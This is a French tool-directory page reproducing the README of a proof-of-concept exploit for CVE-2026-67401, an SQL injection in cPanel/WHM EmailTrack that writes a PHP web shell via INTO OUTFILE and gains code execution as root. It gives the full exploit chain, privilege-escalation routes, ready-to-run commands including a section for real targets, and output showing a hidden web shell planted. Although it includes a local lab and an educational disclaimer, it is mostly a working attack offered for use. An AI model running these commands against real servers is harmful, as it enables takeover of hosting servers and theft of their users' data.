Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-67401 — Preuve de concept pour CVE-2026-67401, une injection SQL dans EmailTrack de cPanel/WHM permettant l'écriture arbitraire de fichiers et l'exécution de code à distance en tant que root, avec des sondes de détection SQLi et un laboratoire vulnérable autonome. | Kitploit
Outils/GitHubGitHub/imbas007/cve-2026-67401
Scanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubimbas007/cve-2026-67401

CVE-2026-67401

Preuve de concept pour CVE-2026-67401, une injection SQL dans EmailTrack de cPanel/WHM permettant l'écriture arbitraire de fichiers et l'exécution de code à distance en tant que root, avec des sondes de détection SQLi et un laboratoire vulnérable autonome.

il y a 3h 59mPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-67401 — Injection SQL dans cPanel/WHM EmailTrack → RCE en root

CVE Severity Platform Python

Preuve de concept pour CVE-2026-67401, une vulnérabilité critique d'injection SQL dans la fonctionnalité EmailTrack de cPanel & WHM qui permet à un utilisateur authentifié disposant de privilèges liés au courrier d'écrire des fichiers arbitraires et d'exécuter du code en tant que root.

Découvert par : Ali Mustafa Divulgué le : 8 septembre 2026 Composant : EmailTrack (journalisation / suivi de livraison des e-mails)


Versions affectées

Les versions antérieures aux builds corrigés sont vulnérables.

Série de builds cPanelVersion corrigée
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

Vérifiez votre version avec :

root@kitploit:~
cat /usr/local/cpanel/version

Chaîne d'exploitation

root@kitploit:~
┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. S'authentifier auprès de cPanel avec un compte disposant de privilèges de courrier.
  2. Injecter via le paramètre account d'EmailTrack.
  3. Écrire un web shell PHP avec SELECT ... INTO OUTFILE dans public_html/.
  4. Exécuter des commandes via le shell.
  5. Élever les privilèges via les binaires SUID de cPanel, cron ou la file de tâches.

Contenu du dépôt

FichierDescription
poc_sqli.pyDétection d'injection SQL : booléenne, temporelle et comptage de colonnes UNION
poc_full_chain.pyChaîne d'exploitation complète : SQLi → web shell INTO OUTFILE → RCE → guide d'élévation en root
lab/vuln_server.pySimulation locale du backend EmailTrack vulnérable (sûr, autonome)
README.mdCe document

Le lab inclus vous permet d'exécuter et de valider toute la chaîne sans véritable serveur cPanel.


Prérequis

  • Python 3.8+
  • Aucun paquet tiers — tout utilise la bibliothèque standard.

Utilisation

Toutes les commandes sont exécutées depuis la racine du dépôt.

1. Lancer le lab local

root@kitploit:~
python3 lab/vuln_server.py 18123 lab/htdocs
  • Identifiants : alice / s3cr1t
  • Émule : la connexion UAPI, la requête EmailTrack vulnérable, SLEEP(), INTO OUTFILE et l'exécution d'un web shell PHP.
  • Argument 1 : port (par défaut 18123)
  • Argument 2 : racine des documents (par défaut lab/htdocs)

Laissez ce processus tourner dans un terminal et utilisez un second terminal pour les PoC.

2. Détection d'injection SQL

root@kitploit:~
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
ArgumentDescription
-H, --hostHôte cPanel, par ex. https://cp.example.com:2083
-u, --usernameCompte cPanel disposant de privilèges de courrier
-p, --passwordMot de passe du compte
--paramParamètre injectable (par défaut : account)
--modedetect (par défaut), boolean, timing, union ou all
--sleepDurée de SLEEP() pour la sonde temporelle (par défaut : 3.0)
--dump-versionTente d'extraire la version du SGBD via UNION
--insecureIgnore la vérification du certificat TLS

Exécuter une sonde spécifique :

root@kitploit:~
# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. Chaîne d'exploitation complète

root@kitploit:~
CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
Argument / EnvDescription
host (positionnel)Hôte cPanel, ou définir la variable d'env CPANEL_HOST
CPANEL_USERCompte cPanel disposant de privilèges de courrier
CPANEL_PASSMot de passe du compte
--shell-baseURL de base servant public_html (où le web shell est accessible)
--insecureIgnore la vérification du certificat TLS
--no-escalateS'arrête après le RCE ; ignore le guide d'élévation en root
SHELL_NAME (env)Nom de fichier du web shell (par défaut : .mail.cache.php)

Étapes exécutées automatiquement :

  1. S'authentifier auprès de cPanel
  2. Confirmer l'injection SQL (booléenne + temporelle)
  3. Déterminer le nombre de colonnes de la requête via UNION
  4. Écrire un web shell PHP avec SELECT ... INTO OUTFILE
  5. Exécuter des commandes via le shell (id, whoami, énumération SUID, …)
  6. Afficher le guide d'élévation en root (SUID whmapi1, cron, file de tâches)

4. Contre une cible réelle

root@kitploit:~
# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

Remarque : le --shell-base par défaut retire le port réservé à cPanel (2082/2083) de l'hôte. Si la racine des documents est servie sur un autre port, définissez-le explicitement.


Résultats vérifiés

Sortie produite contre le lab inclus :

root@kitploit:~
  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

Références

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

Licence

Publié à des fins éducatives et de recherche en sécurité autorisée. Voir Avertissement avant utilisation.

Télécharger l’outil